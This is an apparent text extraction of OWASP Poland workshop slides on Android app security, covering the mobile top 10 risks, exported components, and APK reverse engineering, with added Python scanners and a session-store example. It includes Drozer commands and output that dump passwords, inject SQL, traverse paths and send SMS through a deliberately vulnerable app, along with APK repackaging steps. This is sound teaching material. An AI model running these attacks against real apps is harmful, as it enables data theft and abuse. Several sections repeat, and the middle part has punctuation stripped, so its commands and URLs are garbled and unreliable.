Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawelrzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling
  – High level – Java code
• Disassembling
  – Low level – assembly code
• Why disassembling and not decompiling?
Decompiling
(diagram: DEX → JAR → JAVA)
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows using any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
(diagram: DEX → SMALI)
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps.
The vast majority of installs come from Google Play.
Verify Apps
Apps are verified prior to install.
Warn for or block Potentially Harmful Applications.
Over 10 million installs verified every day.
Verifying is on and visible when needed.
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography, permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions?
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Global problems in securing the applications:
• How sensitive data is stored
  – Isolation
  – Privilege separation
• How sensitive data is transmitted
  – Extra-device communication
  – Inter-application communication
  – Inter-component communication
Android Application Components
(diagram: Activities, Services, Content providers, Broadcast receivers)
AndroidManifest.xml defines in which way the app works and what kind of interaction between components and the outer world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions:
<uses-permission android:name="string" />
<permission android:protectionLevel="…" />
• Components and their attributes
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Example component attributes:
• debuggable
• enabled
• exported
• permission
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested actions/data.
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse("http://www.google.com"));
String pack = "com.android.browser";
ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
intent.setComponent(comp);
startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC - the leading security assessment framework for Android.
Manual on installation and usage
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer is installed in the default package of AppUse together with adb, so it's enough to just "click-and-play".
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app.
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it via intents it's possible to achieve the following:
  – Modify data in the background
  – Trick the user
  – Leak sensitive information
• General hijacking scheme
(diagram: general hijacking scheme)
• Results of an attack:
  – A malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
  – Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
• List and launch exported activities:
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
  com.mwr.example.sieve.FileSelectActivity
  com.mwr.example.sieve.MainLoginActivity
  com.mwr.example.sieve.PWList
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
- In simple words: the application does NOT implement TLS, or implements it incorrectly
What do you mean, "incorrectly"?
- Insecure implementations are:
  - Using known weak protocol versions or ciphers (e.g. SSLv2, SSLv3, RC4)
  - Securing only part of the communication (e.g. only authentication)
  - Lack of certificate inspection
Certificate inspection in web applications – chain of trust
- In web applications the validation of the certificate is on the browser's side
- It is done by a "chain of trust"
- But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
- The expected X.509 certificate or public key is embedded in the source code:
    if (presented_cert == pinned_cert)
        Start_connection()
    else
        Drop_connection()
Cert Pinning - reality
- Guys from Leibniz Universität Hannover tested 100 apps and…
- 21 apps trust all certificates
- 20 apps accept all hostnames
- And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
- Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
- Use Mallodroid:
    mallodroid.py -f AppToCheck.apk -d javaout
- Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
    sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - a few facts from reality
- According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store… (figures shown on the slide)
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
- Any sensitive data MUST be transferred over TLS
- How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
- In simple words: the OS/framework puts sensitive information in an insecure location on the device
- Important note: insecure data storage is about the developer's conscious decision to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data to leak
Unintended data leakage – common leakage points
- URL caching
- Copy/paste buffer caching
- Logging
- Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
- Extract data from leaking content providers using Drozer:
    dz> run app.provider.finduri <package_name>
- Use logcat to verify what is being logged, via ADB:
    adb logcat [output filter]
- Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
- Use Intent Sniffer to see if any confidential data is sent via Intents
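The logcat step is easier to repeat across app versions when the filter is a script rather than eyeballing. The following is an added example (not from the workshop) that runs a few leak patterns over captured logcat output and reports only the kind of leak and the log tag, never the leaked value, so the report itself does not become a second copy of the secret. The log lines, the `ShopApp` tag and the values in them are constructed.

```python
import re

# Constructed logcat lines (hypothetical app tag and values, not from any real app).
SAMPLE_LOGCAT = """\
D/ShopApp ( 1234): Login ok for user=alice password=hunter2
I/ShopApp ( 1234): Received token: Bearer eyJhbGciOiJIUzI1NiJ9.e30.abc
D/ShopApp ( 1234): Location update lat=52.2297 lon=21.0122
W/ShopApp ( 1234): Card on file: 4111 1111 1111 1111
I/ActivityManager( 812): Displayed com.example.shop/.MainActivity: +312ms
"""

# Each pattern names a kind of data that must never reach the shared system log.
LEAK_PATTERNS = {
    "password": re.compile(r"\bpass(word|wd)?\s*[=:]\s*\S+", re.IGNORECASE),
    "bearer_token": re.compile(r"\bBearer\s+[A-Za-z0-9._-]{16,}"),
    "gps_coordinates": re.compile(
        r"\blat\s*=\s*-?\d+\.\d+\s*,?\s*lon\s*=\s*-?\d+\.\d+", re.IGNORECASE),
    "card_number": re.compile(r"\b(?:\d[ -]?){13,19}\b"),
}

# logcat "brief" format: <priority>/<tag>( <pid>): <message>
TAG_RE = re.compile(r"^[VDIWEF]/([^\s(]+)")


def scan_logcat(text):
    """Return (line_number, kind, tag) for every log line matching a leak pattern."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = TAG_RE.match(line)
        tag = m.group(1) if m else "?"
        for kind, pat in LEAK_PATTERNS.items():
            if pat.search(line):
                hits.append((lineno, kind, tag))
    return hits


if __name__ == "__main__":
    for lineno, kind, tag in scan_logcat(SAMPLE_LOGCAT):
        print(f"line {lineno}: {kind} logged by {tag}")
```

In practice the input is `adb logcat -d` saved to a file while exercising the app; the tag column tells you whether the leak is the app's own `Log.d` call or a library, which is what you need to know to file the bug against the right code.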
Unintended data leakage - demo
Unintended data leakage - mitigations
- NEVER log any sensitive information (watch what you're storing in crash logs)
- Disable the copy/paste function for sensitive parts of the application
- Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
- In simple words: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
- Try to bypass authentication by accessing exported activities using Drozer:
    dz> run app.activity.start --component <component_name>
- Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
- Test the account lockout policy
- Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
- A flaw in an application can become an entry point to compromise the operating system
- For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
- …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
- Assume that client-side authorization and authentication controls can be bypassed; they must be re-enforced on the server side whenever possible
- Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
- In simple words: using an insecure implementation, or implementing it in an insecure way
- A few reminders (yeah, I know you know it…):
  - encoding ≠ encryption
  - obfuscation ≠ encryption
Broken Cryptography – how to find
- Decompile the APK using dex2jar (or Luyten for a more verbose result) and review the JAR file in JD-GUI
- Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
- Try to break the encryption algorithm if the application uses custom encryption
- Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/MD5, SHA1, etc.)
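Both the Mallodroid-style TLS review from the M3 "how to find" slide and the decompiled-code review above come down to grepping decompiled Java for a handful of patterns. Here is that review as an added example (not code from the workshop, Mallodroid or any of the projects named): a small static scanner that flags a trust-all `checkServerTrusted`, a disabled hostname verifier, key material assigned from a literal, and weak algorithm names passed to `Cipher`/`MessageDigest`/`Mac.getInstance`. The `NetHelper` class it scans is constructed to contain each mistake once.

```python
import re

# Constructed decompiled Java fragment (hypothetical app code, not from the workshop)
# containing each mistake the scanner looks for.
SAMPLE_JAVA = """
public class NetHelper {
    private static final byte[] KEY = { 0x13, 0x37, 0x42, 0x42 };
    TrustManager tm = new X509TrustManager() {
        public void checkServerTrusted(X509Certificate[] chain, String authType) { }
        public void checkClientTrusted(X509Certificate[] chain, String authType) { }
        public X509Certificate[] getAcceptedIssuers() { return null; }
    };
    void init() {
        HttpsURLConnection.setDefaultHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
        Cipher c = Cipher.getInstance("RC4");
        MessageDigest md = MessageDigest.getInstance("MD5");
        Cipher ok = Cipher.getInstance("AES/GCM/NoPadding");
    }
}
"""

# Tokens of a JCA transformation string that indicate a weak or deprecated choice.
WEAK_ALGORITHMS = {"RC4", "ARCFOUR", "DES", "MD4", "MD5", "SHA1", "SHA-1", "ECB"}

FINDINGS = [
    ("trust-all TrustManager",
     # checkServerTrusted with an empty body accepts any chain
     re.compile(r"void\s+checkServerTrusted\s*\([^)]*\)\s*(?:throws[^{]*)?\{\s*\}")),
    ("hostname verification disabled",
     re.compile(r"ALLOW_ALL_HOSTNAME_VERIFIER|HostnameVerifier\s*\(\s*\)\s*\{[^}]*return\s+true")),
    ("hardcoded key material",
     re.compile(r"(?:byte\s*\[\s*\]|String)\s+\w*(?:KEY|SECRET|Key|Secret)\w*\s*=\s*(?:\{|\")")),
]

ALG_CALL = re.compile(r"(?:Cipher|MessageDigest|Mac)\.getInstance\(\s*\"([^\"]+)\"")


def _line_of(src, offset):
    return src.count("\n", 0, offset) + 1


def scan_java_source(src):
    """Return sorted (line_number, finding) pairs for risky TLS and crypto usage."""
    hits = set()
    for label, pat in FINDINGS:
        for m in pat.finditer(src):
            hits.add((_line_of(src, m.start()), label))
    for m in ALG_CALL.finditer(src):
        # "AES/ECB/PKCS5Padding" -> ["AES", "ECB", "PKCS5PADDING"]
        tokens = m.group(1).upper().split("/")
        if any(t in WEAK_ALGORITHMS for t in tokens):
            hits.add((_line_of(src, m.start()), "weak algorithm " + m.group(1)))
    return sorted(hits)


if __name__ == "__main__":
    for lineno, finding in scan_java_source(SAMPLE_JAVA):
        print(f"{lineno}: {finding}")
```

Run it over the `javaout` directory produced by dex2jar plus a decompiler (one file at a time) and triage the hits; an empty `checkServerTrusted` and `ALLOW_ALL_HOSTNAME_VERIFIER` are exactly the two bugs behind the "21 apps trust all certificates / 20 apps accept all hostnames" numbers cited earlier.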
Broken Cryptography - example
- An encrypted DB is definitely a good idea…
Broken Cryptography - example
- …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
- NQ Vault
Broken Cryptography - mitigations
- Use known, strong cryptography implementations
- Do not hardcode keys/credentials/OAuth tokens
- Do not store keys on the device; use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
- In simple words: malicious code can be provided as input and executed by the application (on the client side)
- The malicious code can come from:
  - another application, via an intent/content provider
  - a shared file
  - a server response
  - a third-party website
Client side injection – what to inject
- SQL injection into the local DB
- XSS/WebView injection
- Directory traversal
- Intent injection
A new Android toy – the Intents
- An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents:
    Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
    Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
- SQL injections:
    dz> run scanner.provider.injection -a <package_name>
- Data path traversal:
    dz> run scanner.provider.traversal -a <package_name>
- Intent injections:
    dz> run app.package.manifest -a <package_name>
    dz> run app.activity.info -a <package_name>
    dz> run app.service.info --permission null -a <package_name>
    dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
- The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
- A crafted URI with the "smdm" prefix allows the remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
- How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
- Always validate any user input on the server side
- For internal communication use only explicit Intents
- Avoid using intent-filters. Even if the Activity has the attribute "exported=false", another application can define the same filter, and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
- In simple words: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
- Intercept requests with a proxy (e.g. Burp) and:
  - Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  - Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  - Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as the session token)
Improper session handling – a few facts from reality
- What we know is that "sessions have to expire"…
- …but how long should they REALLY last?
- According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
- Invalidate the session on the server side
- Set the session expiration time adjusted to your application
- Destroy all unused session tokens
- Use only high-entropy, tested token generation resources
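The four mitigations above fit in one small server-side session store. The following is an added example (not code from the workshop) showing them together: tokens come from the OS CSPRNG rather than from anything the client controls (the device ID from the "how to find" slide is the counter-example), expiry is enforced on lookup, a change of authentication state destroys the old token, and stale tokens are purged. The clock is injectable so the expiry behaviour can be tested without waiting; the class name and the TTL are assumptions, not a reference to any framework.

```python
import secrets
import time


class SessionStore:
    """Server-side session handling: high-entropy tokens, server-side expiry,
    invalidation when the authentication state changes, purging of dead tokens."""

    def __init__(self, ttl_seconds, clock=time.time):
        self.ttl = ttl_seconds
        self.clock = clock          # injectable for tests and clock skew handling
        self._sessions = {}         # token -> (user, expires_at)

    def create(self, user):
        # 32 random bytes, URL-safe base64 (43 chars). Never derive a token from a
        # device ID, user ID or timestamp: those are guessable by other users.
        token = secrets.token_urlsafe(32)
        self._sessions[token] = (user, self.clock() + self.ttl)
        return token

    def lookup(self, token):
        """Return the user for a live token; None (and purge) if unknown or expired.
        Expiry is decided here, on the server, not by a client-side timer."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user, expires_at = entry
        if self.clock() >= expires_at:
            del self._sessions[token]
            return None
        return user

    def invalidate(self, token):
        """Logout: the token stops working immediately, whatever the client keeps."""
        self._sessions.pop(token, None)

    def rotate_on_auth_change(self, old_token, new_user):
        """Login, logout or user switch: destroy the old session and issue a fresh
        token for the new identity, so a token captured before the change is useless."""
        self.invalidate(old_token)
        return self.create(new_user)

    def purge_expired(self):
        """Destroy every token past its expiry; returns how many were removed."""
        now = self.clock()
        dead = [t for t, (_, exp) in self._sessions.items() if now >= exp]
        for t in dead:
            del self._sessions[t]
        return len(dead)

    def active_count(self):
        return len(self._sessions)


if __name__ == "__main__":
    store = SessionStore(ttl_seconds=1800)
    t = store.create("alice")
    print("token length:", len(t), "user:", store.lookup(t))
```

The TTL is the value the "set session expiration time adjusted to your application" bullet asks you to choose; the 71.56-second average session from the slide above is an argument for keeping it short rather than for a one-size-fits-all default.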
Thank you
pawelrzepaoutlookcom
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an APK
Getting our APK file
- From the phone:
  - APK Optic
  - Astro File Manager
- Using ADB
- Using APKPure
Decompiling || Disassembling
- Decompiling: high level – Java code
- Disassembling: low level – assembly code
- Why disassembling and not decompiling?
Decompiling
DEX → JAR → Java
Decompiling - dex2jar
- dex2jar:
  - Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  - Allows using any existing Java decompiler on the resulting JAR file
Decompiling – Java decompilers
- JD-GUI || Luyten:
  - Closed source Java decompiler
  - Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
- Both are Java decompilers but have different OUTPUT
(screenshots: JD-GUI, Luyten)
Disassembling
DEX → Smali
Disassembling
- Apktool:
  - Open source Java tool for reverse-engineering Android apps
  - Transforms binary Dalvik bytecode (DEX) into Smali source
Signing the APK
- Using signapk.jar:
    java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
- Using AppUse
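Why re-signing is needed after the "Modify Smali Files" demo: the signer records a digest of every entry in META-INF/MANIFEST.MF, so a repackaged APK whose classes.dex changed no longer matches its own manifest. The following added example (not code from the workshop or from signapk) builds a minimal JAR-style signed layout in memory, then tampers with one entry and shows the digest check failing. The entry contents are constructed stand-ins; a full verifier would also check CERT.SF against the manifest and CERT.RSA over CERT.SF, which is left out here.

```python
import base64
import hashlib
import io
import zipfile


def build_manifest_mf(entries):
    """Minimal META-INF/MANIFEST.MF (JAR signing v1 layout): one section per entry
    with a SHA-256-Digest line, the way signapk/apksigner record them.
    Long names in real manifests wrap onto continuation lines; not handled here."""
    lines = ["Manifest-Version: 1.0", "Created-By: example", ""]
    for name, data in entries.items():
        digest = base64.b64encode(hashlib.sha256(data).digest()).decode()
        lines += [f"Name: {name}", f"SHA-256-Digest: {digest}", ""]
    return ("\r\n".join(lines) + "\r\n").encode()


def make_apk(entries, manifest_mf):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            z.writestr(name, data)
        z.writestr("META-INF/MANIFEST.MF", manifest_mf)
    return buf.getvalue()


def parse_manifest_digests(manifest_mf):
    """Return {entry name: base64 SHA-256 digest} from the manifest sections."""
    digests, name = {}, None
    for raw in manifest_mf.decode().splitlines():
        if raw.startswith("Name: "):
            name = raw[len("Name: "):]
        elif raw.startswith("SHA-256-Digest: ") and name:
            digests[name] = raw[len("SHA-256-Digest: "):]
    return digests


def check_manifest_digests(apk_bytes):
    """Recompute each entry's SHA-256 and compare with MANIFEST.MF.
    Returns (ok, [entries that no longer match or are unlisted]). A mismatch means
    the archive was modified after signing, e.g. patched smali rebuilt with apktool
    and not re-signed."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        recorded = parse_manifest_digests(z.read("META-INF/MANIFEST.MF"))
        bad = []
        for name, want in recorded.items():
            have = base64.b64encode(hashlib.sha256(z.read(name)).digest()).decode()
            if have != want:
                bad.append(name)
        for info in z.infolist():  # entries the signer never saw are suspicious too
            if not info.filename.startswith("META-INF/") and info.filename not in recorded:
                bad.append(info.filename)
    return (not bad, bad)


def tamper(apk_bytes, name, new_data):
    """Rewrite one entry and leave META-INF untouched, like a naive repackaging."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            dst.writestr(info.filename, new_data if info.filename == name else src.read(info.filename))
    return out.getvalue()


# Constructed stand-in contents (real entries are binary DEX and compiled AXML).
SAMPLE_ENTRIES = {"classes.dex": b"dex\n035\x00constructed-dex",
                  "AndroidManifest.xml": b"<manifest/>"}
ORIGINAL_APK = make_apk(SAMPLE_ENTRIES, build_manifest_mf(SAMPLE_ENTRIES))
PATCHED_APK = tamper(ORIGINAL_APK, "classes.dex", b"dex\n035\x00patched-dex")

if __name__ == "__main__":
    print("original:", check_manifest_digests(ORIGINAL_APK))
    print("patched: ", check_manifest_digests(PATCHED_APK))
```

This is the check the package installer performs before the `signapk.jar` step above has been run on a modified build, and it is why a repackaged app has to be signed with a new key: the original developer's key is not available, so the repackaged APK will never carry the original signature.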
Demo Time
Demo: decompiling with Luyten
Demo: modifying Smali files
Demo
Verify Apps
Apps are verified prior to install
Warns about or blocks Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when needed
Core security features to build a secure application
- The Android Application Sandbox
- An application framework with robust implementations of common security functionality such as cryptography and permissions
- An encrypted file system that can be enabled to protect data on lost or stolen devices
